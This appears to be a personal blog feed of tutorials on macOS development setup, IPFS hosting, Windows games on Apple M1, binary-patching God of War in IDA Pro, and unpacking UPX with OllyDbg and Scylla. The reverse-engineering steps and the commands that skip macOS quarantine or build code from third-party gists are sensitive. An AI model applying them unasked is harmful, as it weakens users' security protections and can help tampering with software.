After opening CMake, select the path of your GLFW directory which needs to be the root folder and create a build folder, click on Configure and select XCode. If you don’t create a build folder, CMake will ask you to create it).

Select XCode and use the default options to configure the project:

It is not really required, but CMake might complain because of a missing tool named doxygen missing, if that’s the case simply install it with HomeBrew:

brew install doxygen

You should get the following window:

Before pressing Generate we’re interested in the first option “BUILD_SHARED_LIBS”, if selected, it will will generate a dylib which stands for dinamic library in macOS. If it is not selected it will generate a static library with an extension .a so for now let’s select the option to get a dylib after the compilation is done!

After pressing Generate you should find a new build folder in the path you chose and a GLFW.xcodeproj containing our XCode project. So for instance you should have:

/Users/your username/Dev/GLFW/build

Compile GLFW with XCode

Open the generated XCode project and select the scheme install (which should already be selected by default):

and press SHIFT + CMD + B to compile the whole project. We can find the dylib in the following path in the Debug directory built by XCode (we’ll repeat the same step later for the static library):

/Users/your username/Dev/GLFW/build/src/Debug

Create a new XCode project to display a window using a dylib

In the output directory, we’re only interested about the dylib file (we don’t care about the aliases) and since dealing with many third party libraries and headers can be a bit messy, we create a folder to share all these files in one single place as also specified on LearnOpenGL. Something like this (don’t worry we’ll get the other files we need later):

Create a new XCode project selecting Command Line Tool as a template and select C++ as language:

We’re going to use the following code for our main.cpp file, I will not explain what the code does since there’s already a great explanation on LearnOpenGL:

#include <glad/glad.h>
#include <GLFW/glfw3.h>

#include <iostream>

void framebuffer_size_callback(GLFWwindow* window, int width, int height);
void processInput(GLFWwindow *window);
// settings
const unsigned int SCR_WIDTH = 800;
const unsigned int SCR_HEIGHT = 600;
int main()
{
// glfw: initialize and configure
 // ------------------------------
 glfwInit();
glfwWindowHint(GLFW_CONTEXT_VERSION_MAJOR, 3);
glfwWindowHint(GLFW_CONTEXT_VERSION_MINOR, 3);
glfwWindowHint(GLFW_OPENGL_PROFILE, GLFW_OPENGL_CORE_PROFILE);
#ifdef __APPLE__
 glfwWindowHint(GLFW_OPENGL_FORWARD_COMPAT, GL_TRUE);
#endif

// glfw window creation
 // --------------------
 GLFWwindow* window = glfwCreateWindow(SCR_WIDTH, SCR_HEIGHT, "LearnOpenGL", NULL, NULL);
if (window == NULL)
{
std::cout << "Failed to create GLFW window" << std::endl;
glfwTerminate();
return -1;
}
glfwMakeContextCurrent(window);
glfwSetFramebufferSizeCallback(window, framebuffer_size_callback);
// glad: load all OpenGL function pointers
 // ---------------------------------------
 if (!gladLoadGLLoader((GLADloadproc)glfwGetProcAddress))
{
std::cout << "Failed to initialize GLAD" << std::endl;
return -1;
}
// render loop
 // -----------
 while (!glfwWindowShouldClose(window))
{
// input
 // -----
 processInput(window);
// render
 // ------
 glClearColor(0.2f, 0.3f, 0.3f, 1.0f);
glClear(GL_COLOR_BUFFER_BIT);
// glfw: swap buffers and poll IO events (keys pressed/released, mouse moved etc.)
 // -------------------------------------------------------------------------------
 glfwSwapBuffers(window);
glfwPollEvents();
}
// glfw: terminate, clearing all previously allocated GLFW resources.
 // ------------------------------------------------------------------
 glfwTerminate();
return 0;
}
// process all input: query GLFW whether relevant keys are pressed/released this frame and react accordingly
// ---------------------------------------------------------------------------------------------------------
void processInput(GLFWwindow *window)
{
if(glfwGetKey(window, GLFW_KEY_ESCAPE) == GLFW_PRESS)
glfwSetWindowShouldClose(window, true);
}
// glfw: whenever the window size changed (by OS or user resize) this callback function executes
// ---------------------------------------------------------------------------------------------
void framebuffer_size_callback(GLFWwindow* window, int width, int height)
{
// make sure the viewport matches the new window dimensions; note that width and
 // height will be significantly larger than specified on retina displays.
 glViewport(0, 0, width, height);
}

We need a couple of things to make our code fully functional, following the LearnOpenGL tutorial, we need to set GLAD a Vulkan/GL/GLES/EGL/GLX/WGL Loader-Generator based on the official specifications for multiple languages. As quoted on LearnOpenGL we need this generator because:

OpenGL is only really a standard/specification it is up to the driver manufacturer to implement the specification to a driver that the specific graphics card supports. Since there are many different versions of OpenGL drivers, the location of most of its functions is not known at compile-time and needs to be queried at run-time. It is then the task of the developer to retrieve the location of the functions he/she needs and store them in function pointers for later use. Retrieving those locations is OS-specific.

The code we need for the header glad.h can be generated through a web service which will also generate the cpp file we need to use in our XCode project. You can use a version of OpenGL from 3.3 up to the most recent with the following settings:

Click on Generate to download a zip file containing two include folders, and a single glad.c file. Put the files inside the two include folders in your OpenGL directory, the one to share the libraries and the headers across other projects. I have the files in a path like:

/Users/your username/Dev/OpenGL

We also need glfw3.h to be copied inside the include folder of your OpenGL directory or the code will not compile, we can find this header inside the include folder of the source package we downloaded before:

/Users/your username/Dev/GLFW/include/GLFW/glfw3.h

And put it in:

/Users/your username/Dev/OpenGL/include

Add glad.c to your XCode project, at this point we need to update the Build Settings and Build Phases of our XCode project to both use the dylib and where to find the headers. In your project navigator, click on the top icon which will open the .xcodeproj to update (rememeber to select the Target which is our console application not the Project), click on Build Settings and look for these two entries in the Search Paths build setting:

Header Search Paths
Library Search Paths

Here we need to add the paths of our directories, you can set them to be non-recursive but you have to put every single folder you want to be included in your project separetely. In this case, we can set it to be recursive since we’re insterested in all files in the OpenGL folder. You should have the following settings in your project after the changes:

Now we need to go the Build Phases tab and add libglfw.3.3.dylib like so:

Hit SHIFT + CMD + B and run the project:

Create a new XCode project to display a window using a static library

For the static library it’s almost the same process, you need first to generate again the XCode project using CMake to compile the source package, remember to unselect the “BUILD_SHARED_LIBS” so it will compile the static library.

After libglfw3.a has been generated, put this file in your OpenGL directory inside the lib folder. The XCode project is almost the same but this time instead of linking a dylib in the Build Phases tab, we’re going to link the static library, the Cocoa, OpenGL and IOKit frameworks:

It’s also possible to do the same without linking manually the libraries in Build Phases, in fact we just need to set another property in the Build Settings to use some command line parameters. So simply set this entry in this way without linking any libraries in the Build Phases:

It’s practically the same as using the command line to compile the code with Clang by adding the required libraries and frameworks:

clang++ -o main main.cpp -lglfw3 -framework Cocoa -framework OpenGL -framework IOKit

Compile the code with Clang and install GLFW with HomeBrew

We learned how to create link a dylib and static library in XCode, but there’s another way to run our code through the terminal and since we’re using HomeBrew, we just need to install the package to get everything we need:

brew install glfw

And by doing so, we can skip the steps where we compiled the source package. I created a repository with the source code I used which is basically the same as the one used for XCode, the only small difference is that we’re using a makefile to generate everything we need from the project since it would probably be complicate to run many long commands in the terminal so instead, we let make doing the job for us. This is the makefile I used:

C_FLAGS := -g -Wall -Wextra
CC := clang++
RM := rm
LINKFLAGS := -lglfw3 -framework OpenGL -framework IOKit -framework Cocoa
.PHONY: $(TARGET)
.PHONY: clean
VPATH:= ./src/ ./obj/ ./include/
# Path for .c , .h and .o Files
SRC_PATH := ./src/
OBJ_PATH := ./obj/
INC_PATH := -I ./include
# Executable Name
TARGET := start
# Files to compile
OBJ1 := glad.o \
 main.o
OBJ := $(patsubst %,$(OBJ_PATH)%,$(OBJ1))
# Build .o first
$(OBJ_PATH)%.o: $(SRC_PATH)%.*
mkdir -p $(@D)
@echo [CC] $<
@$(CC) $(C_FLAGS) -o $@ -c $< $(INC_PATH)
# Build final Binary
$(TARGET): $(OBJ)
@echo [INFO] Creating Binary Executable [$(TARGET)]
@$(CC) -o $@ $^ $(LINKFLAGS)
# Clean all the object files and the binary
clean:
@echo "[Cleaning]"
@$(RM) -rfv $(OBJ_PATH)*
@$(RM) -rfv $(TARGET)

Clone the repository and in the terminal, type make in the root folder of the project. After that there should be a file named start, just run it by typing ./start.

TLDR

Compiling the code with Clang and make was fairly simple unlike setting everything with XCode but now you should know how to compile the source code from a library, which can be useful for the reasons I explained before! LearnOpenGL is a great source to learn OpenGL even though for macOS only a few things are explained and the process to get everything working is a bit complicate, but if you have any issues with the code in the next chapters of LearnOpenGL, you can always check the Github repo which contains a small guide to compile the code in the terminal and create a XCode project!

Reverse Engineering tools used in my Youtube videos

Wed, 21 Dec 2022 00:00:00 +0000

Youtube doesn’t really like links to reverse engineering resources, especially if you put some downloadable content like an exe file (for obvious reasons). So to avoid pasting in each video description a list with the tools that I used, here’s the complete list with all the tools I’ve used:

And here’s the list of samples along the corresponding video:

For the samples regarding VMP and Themida, you can find them on the Challenges page in the Unpackme section.

Deploy a decentralized Hugo static website with IPFS

Fri, 25 Nov 2022 00:00:00 +0000

I’ve always been curious about decentralized applications, especially the web counterpart. With so many centralized solutions to deploy your website, I wanted to see if there were any decentralized. One good alternative I found to other platforms is fleek.co, you can use it to deploy your website with IPFS or DFINITY’s Internet Computer (‘IC’). For this post I will only focus on IPFS to deploy the website with Hugo. Before getting into more details, you should have a basic understanding of Blockchain.

Intro to IPFS

It is used for storage then you need some other application on a different blockchain like Ethereum, to manage how data is going to be stored and retrieved from IPFS. Every file you put on IPFS will have its own hash and can be used to retrieve a block content within the desktop application, the CLI or other implementations listed on the official website. So for instance, let’s say you want to upload a txt file on IPFS, you simply drag and drop the file in the desktop application and a new hash will be linked to this file:

Having the hash allows you to access the file, you can use a browser like Brave to do so, just right click on the file in IPFS desktop and select “Share Link” to get the full link of the block:

https://ipfs.io/ipfs/QmUngsLqehjMuEVQ8e6SYkmA5SYd8xjb6dYDD56fuuXj2U?filename=test.txt

Or you can import the hash in IPFS and you will be able to access its content. Keep in mind though as soon as you shut down your IPFS daemon the site will be become unreachable so to avoid that, you can use Pinning! With a service like Pinata, you can either provide an hash or upload directly a file and it will be hosted on IPFS. E.g.:

As you may noticed, it’s not a difficult process to follow but unfortunately each time you update some files, you have to repeat everything from the start which of course is not very convenient. To avoid being redundant, fleek.co comes into play and it’s the service we are going to use to host our Hugo website.

Deploying a Hugo website on Fleek

As a reference you can use my website which is hosted on fleek.co. Create an account on Fleek and connect it to your Github account:

Select as Hosting Service IPFS, after that you need to set the build settings, the following interface is presented to you where you can choose the framework and set the docker image:

I do not recommend using these settings for Hugo unless you don’t need the extended version. The default Docker image does not support the extended version so you will not be able to deploy your website. I tried other Docker images on the Docker Hub and I’ve found an image which worked with my website, but the Hugo version used was the 0.87 so not very recent and there was no way to use the most recent one. If you check the code of my repository, you’ll notice that in the root folder there’s a file named as .fleek.json:

{
"build": {
"image": "drakobombo/hugo-extended-fleek:latest",
"command": "hugo --gc --minify && echo $BUILD_STATUS_ENV",
"publicDir": "public",
"baseDir": "",
"environment": {
"BUILD_STATUS_ENV": "Build finished!"
}
}
}

With this json, you don’t need to set any deployment settings on fleek dashboard because they will be overwritten by the configuration being used in the json. I mentioned that I didn’t find any working docker images but only one without the most recent version, so I created my Docker image and I deployed it to the Docker Hub. The code that I used for my image is pretty straight forward, I just had to change the entry point because with the default one used by Docker, the deployment on Fleek was still not working:

FROM klakegg/hugo:latest-ext

WORKDIR /site

ENTRYPOINT [""] 
CMD ["hugo"]

Another thing that I’d like to mention, you can’t build arm based images on Fleek. So if you’re compiling the image on apple silicon it will not work, because we need to target an x32/x64 build like so:

$ docker buildx build --platform linux/amd64 -t "hugo-extended-fleek" .

That’s it, you can deploy your Hugo website using my configuration!

A few notes about the domain

I managed to connect my current domain on Fleek, but there were some issues during the domain verification. For any issues you can contact the Fleek support by opening a ticket on Discord.

I also had to change my DNS provider to Cloudflare because the new Fleek setup requires you to use ANAME/ALIAS which are not supported with some providers. I will not explain the whole process that I did, you can follow the documentation especially if you want to use Cloudflare as your DNS provider. Just one very important thing that I want to point out, if you decide to use the latter, remember to follow these two essential steps listed in the documentation:

If you are using Cloudflare, as in pointing your domains to their name servers to use Cloudflare’s DNS service, you can still upgrade your DNS records to the new DDOS protected infrastructure.

Follow the instructions above, with these two slight differences:

In Cloudflare, ANAME records need to be set as CNAME records.

You need to turn Orange Cloud OFF (disabling HTTP proxy mode) in Cloudflare for your DNS domains.

If you don´t turn off the Orange Cloud/Proxy for your domain when setting your DNS records on Cloudflare, your custom domain will fail its DNS verification on Fleek. To do so, visit the DNS App in Cloudflare, and edit your DNS records, there you can Click the orange cloud on each record to turn it OFF (Grey).

ENS

As an alternative if you don’t want to buy a domain from the major platforms like Google or GoDaddy, I present you ENS, decentralized domains based on the Ethereum Blockchain! Exciting as it might sound, it’s important to note that not all browsers are currently supporting ENS domains. So at the moment, the browsers listed below are supporting a decentralized domain:

Credits for the image to ENS

It’s not just a domain, from the ENS website, it’s your web3 username which can be used to store all of your addresses and receive any cryptocurrency, token, or NFT.

TLDR

Deploying a decentralized website is quite different unlike the usual way, nonetheless services like fleek.co lets you focus entirely on the development of your website without caring too much about repeating the same steps each time you change some files as we saw earlier. If you’re interested to know more about IPFS, you can take a look at the concepts section on the documentation which explains in greater details how IPFS is working.

Install Node js on Windows without admin rights

Fri, 18 Nov 2022 00:00:00 +0000

If you have your own laptop with admin rights, you don’t need to read this article further. On the contrary if you are working in an IT company where you can’t run any application with an admin account, it may save your time having Node js installed in a separate folder so you can freely change or update its content.

I had an old version of Node js installed on my laptop and I needed to update it in order to use the Angular CLI, which is requiring a minimum version of Node js to work.

Setting the environment variables in Windows for Node js

Download the Windows Binary and unzip its content in the C:\ drive or another folder that is easily accessible to you. The environment variables editor can also be launched with the following command from the Windows command-line prompt (CMD):

C:\> rundll32 sysdm.cpl,EditEnvironmentVariables

Now we need need to add a new variable to the Path variable inside the User variables. Just put the path where you unzipped the content of the Windows Binary.

Setting another environment variable for ng

This step is not necessary, but as soon as you install a global package and you want to run it from the command line, you might get an error such as:

'ng' is not recognized as an internal or external command, operable program or batch file

Assuming you don’t have admin rights, there’s a folder in Appdata which is holding the node modules being installed, simply put the following path in the system variables to solve the issue (put your username in the path):

C:\Users\your username here\AppData\Roaming\npm

Just reopen again the CMD and you can again use both global packages and Node js from the command line without admin rights.

TLDR

This is the only working fix that I found without using admin rights, there are ways to solve the issue related to packages missing and not usable through command line like changing the Node js prefix, but they still require admin rights to work.

Patching God of War on M1 with IDA Pro

Thu, 10 Nov 2022 00:00:00 +0000

Playing Windows games on macOS can be tricky, especially if the game requires more than a few tweaks to make it work. I was checking the Apple Gaming Wiki but some information is missing or incorrect to get a game running. Use the wiki as a reference but do your own research to find out how to run a specific game.

It is possible to play God of War on macOS but only if you reverse the exe file and you patch a few assembly instructions. This method has been shared by the developer Nas and Andrew Tsai made a video about God of War.

Regarding the tools, you need CrossOver to run the game and the free version of IDA Pro to patch the file.

Remove checks for Windows 10

Launching the game through Steam will result in an error:

Even creating a Windows 10 bottle does not solve this issue so the only way to get the game working is to patch the exe. Navigate to your God of War directory, drag and drop GoW.exe in IDA Pro after clicking on Go Work on your own, you can easily access the directory by right clicking on the Steam bottle or another bottle that you are currently using in CrossOver, to open the C: Drive in Finder.

After the file has been loaded in IDA Pro, open the Strings subview in the App Menu:

Right click in the view to select Quick Filter, a text box will appear at the bottom, type the error “You need at least Windows 10” to filter the results:

Double click on the only displaying result, you should be in the text view with an instruction being highlighted:

Right click on it to select “List cross references to…” and pick the first option:

Now you should be in the Graph View, double click on the arrow right on top the following Group Nodes to go the jnz instruction that we need to change:

To patch the jnz instruction, simply click on it, after that in the App Menu click on Edit -> Patch program -> Assemble...:

Replace jnz with jmp to skip the check for Windows 10:

After clicking OK, a few popups will come up asking you to patch other instructions, since we only needed to change the jnz instruction you can ignore them.

We still need to patch one more jnz regarding the Windows 10 error, go back to Strings subview and search again for the error, right click on the line and select “List cross references to…” this time we are interested in the second instruction of the two. Trace back to jnz and patch it with another jmp as you did before. If you did everything correctly, you should see in the subview Patched bytes two addresses being changed:

Remove checks for Direct3D

If you patch and launch the exe you will get another error:

So the first two checks for Windows 10 are patched, but we still need to remove two more checks regarding Direct3D to run the game. Open again the Strings subview and filter the message showed in the above screenshot, double click on the only line being displayed, right click to list all the references and pick the only option available. You should be in the following Group Nodes:

Right click on the first instruction, select again “List cross references to…” and pick the only option available. Right click on the Group Nodes to switch to text view, patch the js instruction by removing it completely and typing nop instead:

Type nop in the upcoming popups until all the yellow addresses on the left are gone. You should get this result:

We need to repeat the same steps one more time, so go back to Strings subview typing the same error message if it is not already being highlighted, right click to list cross references, select the only option available and this time patch the jl instruction. You should get the same result in the above screen, you should also get 4 different addresses with the following bytes being patched:

Click on the IDA View tab and click on Edit in the App Menu to apply patches to input file:

Use the default settings to generate the output file, in the output window there should be a line saying that the patches have been applied:

Applied 14/14 patch(es)

You can finally launch the game through crossover and this time, no errors will show up:

TLDR

Although there was already the video made by Andrew Tsai showing how to patch the game, I still wanted to understand how Nas found the instructions to patch the game. In this case it wasn’t too complicate, just look for the strings in IDA Pro and patch all the instructions leading to Group Nodes responsible to trigger the errors. But it’s still nice to practice a bit on these challenges just to see how things are done and if you can also repeat the same steps to get an application running after applying small patches.

Reverse Engineering UPX with Parallels and OllyDbg on Apple Silicon

Sun, 17 Apr 2022 00:00:00 +0000

In one of my older posts which you can find here, I talked about the different tools to virtualize an OS on the Apple Silicon MAC and I declared a winner which was Parallels. From the moment the latter is the best tool to virtualize an OS at the moment, I decided to reverse some x86/x64 bit applications. Even if we are on Windows ARM, most of these applications will work perfectly thanks to a translation process, which is very similar to Rosetta 2.

What tools are currently working ?

x32dbg has some issues, as soon as I attached it to a x86 bit process or I opened an exe, it immediately crashed. On the other side, x64dbg is working pretty well. An alternative to x32dbg is of course OllyDbg but the official version doesn’t have the necessary plugins to unpack a malware or to prevent it from being detected by an anti debug. I used this version on Github which contains the most useful plugins.

Some other tools that I used and are currently working:

Things that we need

The first thing that you should do is to isolate your VM from your MAC by checking the selected checkbox:

By default, Parallels will share your VM folders with your MAC and it’s better to isolate everything from your host machine, especially if you’re working with malware samples. Not only that, many folders will be related to your MAC as shared folders and they’ll have a path like //MAC//…//Downloads and some applications will not work correctly. So in this case isolating your MAC from the VM will make your life easier.

These are the tools that we need:

OllyDbg with the best plugins
Scylla - x64/x86 Imports Reconstruction
UPX
Bintext as the malware sample, which will be packed with UPX
Parallels with Windows 10 or 11

An overview of UPX

After you downloaded UPX, simply add its folder to the environment variables of Windows or open the command prompt and navigate to its folder. It’s not very complicate to unpack UPX from the moment it can be also be removed from an executable by running the following command from the command prompt:

C:\> upx -d bintextPacked.exe -o bintextUnpacked.exe

However from the moment we are here to learn it is better to unpack an exe with a debugger, to see how it works behind the scenes. Let’s run this command to pack bintext:

C:\> upx -9 bintext.exe -o bintextpacked.exe

Even if it is simple to unpack an exe packed with UPX, the latter is often used by malware authors to bypass detection by antivirus signatures.

Find the OEP with OllyDbg

As soon as we launch the packed exe in OllyDbg with administrator privileges, we can see that the first instruction being used is PUSHAD which is simply going to push the contents of the general-purpose registers onto the stack. It is also commonly used with POPAD.

Instructions displayed in OllyDbg

Now to unpack the exe, we simply need to scroll down until we hit a jump followed by a bunch of zeroes as shown in this example:

We can put a breakpoint on this jump with F2 by clicking on it, after that we press F9 to execute the code until it reaches this jump. Press F7 and you should get the following set of instructions:

The first instruction PUSH EBP is the OEP (original entry point) that we need to dump and fix the IAT (import address table) with Scylla.

Dump the exe and fix the IAT with Scylla

At this point we found the OEP, let’s copy its address to the clipboard and open the x86 version of Scylla along with the packed exe. We can close OllyDbg from the moment we don’t need it anymore. Follow these steps to complete the unpack process:

At this point we can open the unpacked exe successfully!

TLDR

As you can see it is not complicate to unpack UPX and many of the reverse engineering tools are perfectly working with Parallels on the ARM architecture. I only isolated Parallels from my MAC and I left the other default settings unchanged. If you need to debug x64 bit applications, you can safely use x64dbg.

Legendary, a replacement for the Epic Games Launcher on macOS

Fri, 24 Dec 2021 00:00:00 +0000

This is going to be a pretty straight forward overview of Legendary. Unlike the Epic Games launcher, Legendary is a command line application and with it you can install games, synch saves, play multiplayer and many other features. If you want to know more you can check the repo on Github.

I’m using an Apple M1 and I didn’t encounter problems so far, of course it depends what game you’re playing but generally speaking Legendary is better than the original Epic Games launcher, the latter doesn’t run very well.

Steps to download and install a game

Download from the releases page on Github the macOS build, after that open the terminal and make the file an executable:

$ chmod +x legendary

At this point you can launch the executable in this way:

$ ./legendary

Or you could add an entry to the PATH environment variable, in this way you can launch the executable from every folder in your terminal. In the most recent macOS versions, you just need to add a line in your “~/.zshrc”, e.g.:

$ export PATH=$PATH:/path/to/directory

After you downloaded and set the environment variable, you can download and install a game by following these steps:

$ legendary auth

To install a game you may want to check your library:

$ legendary list-installed

Install a game by passing the exact name displayed by the previous command (replace “Torchlight II” with your game):

$ legendary install "Torchlight II"

Launch the game:

$ legendary launch "Torchlight II"

That’s it, you can play your games from the Epic Games Store without the launcher!

Play DOOM 3 natively on Apple M1

Fri, 24 Dec 2021 00:00:00 +0000

I saw a few resources on Google where you can play DOOM 3 or other old games using some tweaks to play them, however there are better solutions to get these games to work. In the DOOM 3 case, a mod called dhewm3 has been created to bring DOOM 3 with the help of SDL to all suitable platforms. But for some reason, there isn’t an official release for macOS on the Github page. Nonetheless a user made a build for macOS to play this mod, you can find more info about this topic here. It’s not a big deal to get DOOM 3 working with this mod, you just need to copy the base folder from the DOOM 3 installation of Steam and paste this folder into the dhewm3 directory.

What about DOOM 3 BFG Edition ? I made this post mainly because at the moment there isn’t a post or a video which explains how to play the BFG edition on an Apple M1. Besides that, the DOOM 3 resources that you can find on Google explain how to run it using Rosetta 2, but as I said there are better solutions and we’re going to discuss about these solutions shortly.

Download the necessary game files of DOOM 3 with the SteamCMD

There’s no need to install Steam on Crossover or Parallels to download a Windows build, the SteamCMD is the smartest way to download a Windows build.

To install the SteamCMD on macOS, simply follow these two steps as specified on the documentation:

Open Terminal.app and create a directory for SteamCMD.

$ mkdir ~/Steam && cd ~/Steam

Download and extract SteamCMD for macOS.

$ curl -sqL "https://steamcdn-a.akamaihd.net/client/installer/steamcmd_osx.tar.gz" | tar zxvf -

You can download a Windows build by launching the script that you just downloaded:

$ ./steamcmd.sh +@sSteamCmdForcePlatformType windows +login <YOUR_STEAM_LOGIN_NAME> +force_install_dir ./doom3/ +app_update 9050 validate +quit

Of course you have to replace <YOUR_STEAM_LOGIN_NAME> with your username, ./doom3/ with another folder name if you don’t like it and 9050 with the correct app Id. Wait, how do I find the app Id ? In this case you don’t need to change it, but just in case you want to repeat this step with other games, open in a browser the Steam store page of the game that you want to download and look at the URL, you should see a number and that’s the app Id, e.g.:

9050 is the app Id.

If you get an error like this in the terminal which stops the download:

Error! App '263300' state is 0x402 after update job.

just relaunch the previous command to resume the download.

Download and configure the source port

So far so good, but we still need to do some more tweaks to get the game working. Download the source port of DOOM 3 from Mac Source Ports, as specified in the “Installations Instructions”, make a “~/Library/Application Support/dhewm3/” directory. Copy the “base” directory from an existing installation of DOOM 3 into it. From here dhewm3.app should run and be able to find the data.

You said in the post title “Play DOOM 3 natively on Apple M1” but I want proof!

On the official page of dhewm3, it says this:

If you’re using macOS, MacSourcePorts.com provides signed and notarized dhewm3 binaries for 64bit Intel and Apple Silicon.

And if we check the executable from Mac Source Ports, we get this:

$ file dhewm3
dhewm3: Mach-O universal binary with 2 architectures: [x86_64:Mach-O 64-bit executable x86_64] [arm64]
dhewm3 (for architecture x86_64): Mach-O 64-bit executable x86_64
dhewm3 (for architecture arm64): Mach-O 64-bit executable arm64

So as you can see this is not a build just made for arm64 but it’s an universal binary, however in this way there isn’t the translation process through Rosetta 2 from the moment you just run the game natively.

We could still check from the Activity Monitor if the game is running natively, if we see Apple then we know that is not using Rosetta 2:

What about the BFG Edition ?

It’s just the same process, to summarize everything:

Download the game files from Steam through the SteamCMD
Download and configure the source port from Mac Source Ports by following the “Install Instructions” for that specific game

TLDR

There are many ways to play Windows games on macOS which don’t necessarily rely on Crossover and Parallels. If you just need to download the files of a Windows game without running directly the executable through Steam, you just need to use the SteamCMD. In all other cases, use Parallels or Crossover, Wineskin does not work very good with Steam unfortunately.

Wineskin Server, a free alternative to Crossover on M1

Wed, 22 Dec 2021 00:00:00 +0000

I read many articles online but many of them (most if not all) only mention the same tools to play Windows games on an Apple M1, e.g.:

Parallels
Crossover
Emulation in general, not limited to Parallels but the latter is the only software at the moment which works very good

Boot Camp does not work on an Apple M1 as officially confirmed by Apple. As you can see you don’t have many options which are also free, you could also emulate Windows through UTM but it does not work that great. I wrote a post about the best software to use to emulate an OS if you want to check it out. Wine does not have an official binary for macOS Catalina 10.15 or later as mentioned here, but we can use this Wineskin Server project which supports MacOSX10.13 to macOS11. I am currently using macOS 12.0.1 but it works flawlessly.

Install Wineskin

As specified on the Github repository, we just need to run the following command to install Wineskin:

$ brew install --no-quarantine gcenx/wine/unofficial-wineskin

Which Windows games are supported ?

Steam games don’t work very well, I managed to install Castlevania Lords of Shadow Mirror Fate but Wineskin was running the game at 30 FPS or even less in some scenarios. However if you install a GOG game, it’s a complete different story from the moment you don’t need a client opened to play a game. You just need to download a game through the offline installer, of course you have to consider that not all games are supported but it’s much easier to get a game running. I noticed that some games on GOG which are also available on macOS, can only be downloaded for the Windows platform, in this case if you see the same game on Steam available on macOS, then buy the game on Steam from the moment you’ll get a better performance with Rosetta 2.

Let’s setup a Wrapper with Wineskin

When you open Wineskin you get an interface like this:

Before creating a Wrapper you need to install an engine, you can download the engine WineCX20 or greater. If you don’t see the engine from Wineskin, you can download it from here. After that you just need to copy and paste the file in the path ~/Library/Application Support/Wineskin/Engines. Create a Wrapper and navigate to this path ~/Applications/Wineskin you should see the Wrapper that you just created:

Keep in mind that you need to use the correct architecture, if you use a x64 engine on a x86 game it’s not going to work. You don’t need to use the installer to extract the game files to check the architecture of the exe, I’ll show you later another way to install a game without launching the setup.

Right click on the Wrapper and click on Show package contents, from here you can manage your Wrapper by copying files inside the drive_c folder and other settings through the Wineskin app:

Download the offline installer from GOG

Click on a game and download the offline installer files:

Install the game with the offline installer

Follow these steps to install correctly the game:

Drag and drop the files in the drive_c folder of your Wrapper
Open the Wrapper and click on the advanced options to set the path of the installer, e.g.:

Click on Test Run to launch the installer:

After the installation is complete, repeat the step 2 by choosing the exe of the game, in my case is War2Launcher.exe keep in mind that if the game is working, you just need to open directly the Wrapper and it’ll launch the game without clicking on Test Run

If the game is supported and if you used the correct architecture, it should run without any issues:

Use innoextract to extract the files from the setup

Another way to play GOG games is to use the innoextract tool, which is used to unpack installers created with Inno Setup. From the documentation, the simplest way to install innoextract is using the Homebrew package:

$ brew update
$ brew install innoextract

If the GOG offline installer doesn’t include some kind of bin files, you just need to run the following command:

$ innoextract mysetup.exe

If it includes the bin files, run this command (all files need to be in the same directory):

$ innoextract mysetup.exe --gog

The files are extracted but how do we check which architecture the exe is using ? Run this command by passing the exe of the game:

$ file example.exe

Which prints:

example.exe: PE32 executable (GUI) Intel 80386, for MS Windows

After the files are extracted, you just need to choose the correct exe to run in Wineskin and you are ready to play (if there are not other issues to solve first).

TLDR

Wineskin Server is a good free alternative to Crossover and Parallels. Unless you have a Windows PC, before buying a game should check if that particular game is playable on an Apple M1, there are many websites that you can use, I recommend AppleGamingWiki. Each game requires different settings and tweaks to make it work, there isn’t a standard solution so you’ll need to google for some intel.

QEMU, VMWare, Parallels or UTM, which one is the best with Apple M1 chip ?

Fri, 11 Jun 2021 00:00:00 +0000

I always used PCs with Windows already pre-installed but I never tried a Macbook before. I was also curious about the new Apple M1 chip and from the moment it was released recently, I thought it was a good time to discover new features to help the community to use efficiently these Macbooks with the new chip. We are going to analyze each tool in order to declare a winner.

QEMU

Before the version 6.0.0 to make a VM work, you had different options:

The easiest option was to download this tool on Github and simply drag and drop the image and press start, pretty simple right ? Not really, I was only able to make the Windows ARM version work with this tool, for some reason it was not working with Ubuntu Server. I made a video about the emulation with QEMU where I also talk about this issue, it’s probably caused by some wrong parameters used when the qemu-img command is executed.
Do everything manually from compiling the QEMU source code to build the VM, there are many other posts where they teach you how to do this. The following posts are outdated but they give a good overview about how to compile the source code of QEMU:
Download a QEMU fork (for those who don’t know what is a fork, it’s simply a copy of a repository) with Alexander Graf’s qemu hypervisor patch installed and launch the VM from the terminal always using QEMU (not the one installed with homebrew). For example this is the script that I used with Ubuntu Server:

./qemu-system-aarch64 \
 -serial stdio \
 -M virt,highmem=off \
 -accel hvf \
 -cpu cortex-a72 \
 -smp 4,cores=4 \
 -m 4096 \
 -bios "/Applications/ACVM.app/Contents/Resources/QEMU_EFI.fd" \
 -device virtio-gpu-pci \
 -display default,show-cursor=on \
 -device qemu-xhci \
 -device usb-kbd \
 -device usb-tablet \
 -device intel-hda \
 -device hda-duplex \
 -drive file="myPathHere/ubuntu-server.qcow2",if=virtio,cache=writethrough \
 -cdrom "myPathHere/ubuntu-server.iso"

But wait where can I find a fork with this patch already installed ? ACVM already contains a QEMU build with this patch installed, there is also this link where you can find another fork (you can also find the link on this post).

UTM

The process to create a VM is more simple, for example to create a Windows VM you can take a look on the official website. There is also a gallery page where you can get a good explanation about how to install different OS if you are not interested in Windows 10.

Unfortunately there is a catch, at least for Windows 10, I didn’t test other operative systems. For some reason the Edge Browser continuously open again and again, besides that the cursor flickers constantly and it’s very annoying. Is there a way to fix this ? I didn’t found a solution but if you have found it, you can share it in the comment section below (or if I found a solution I will update this post). As you might imagined Windows 10 does not work very well with UTM but these issues are also present in QEMU (I mean QEMU standalone, of course UTM is built around QEMU).

UTM release 2.4.1

Apperantly the issue with the mouse flickering was fixed with the release 2.4.1, you just need to use the latest SPICE tools ISO. Nonetheless there are still some performance issues.

VMWare Fusion

At the moment VMWare Fusion has a technical preview, which can be downloaded from the official website.

You can install Windows 11 and it actually works pretty well, even though you have to do some tweaks (some of these tweaks are the same for UTM):

Download the necessary UUP Files from uupdump
Follow this video on Youtube to install Windows 11 on VMWare Fusion
The video doesn’t explain how to download the UUP Files with the macOS script, you basically need Homebrew however there are some issues with a package that you need to install. In the terminal launch these commands which are also listed here to make it work:

curl -LO https://gist.github.com/minacle/e9dedb8c17025a23a453f8f30eced3da/raw/908b944b3fe2e9f348fbe8b8800daebd87b5966c/openssl@1.0.rb
curl -LO https://gist.github.com/minacle/e9dedb8c17025a23a453f8f30eced3da/raw/908b944b3fe2e9f348fbe8b8800daebd87b5966c/chntpw.rb
brew install --formula --build-from-source ./openssl@1.0.rb
brew install --formula --build-from-source ./chntpw.rb
rm ./openssl@1.0.rb ./chntpw.rb

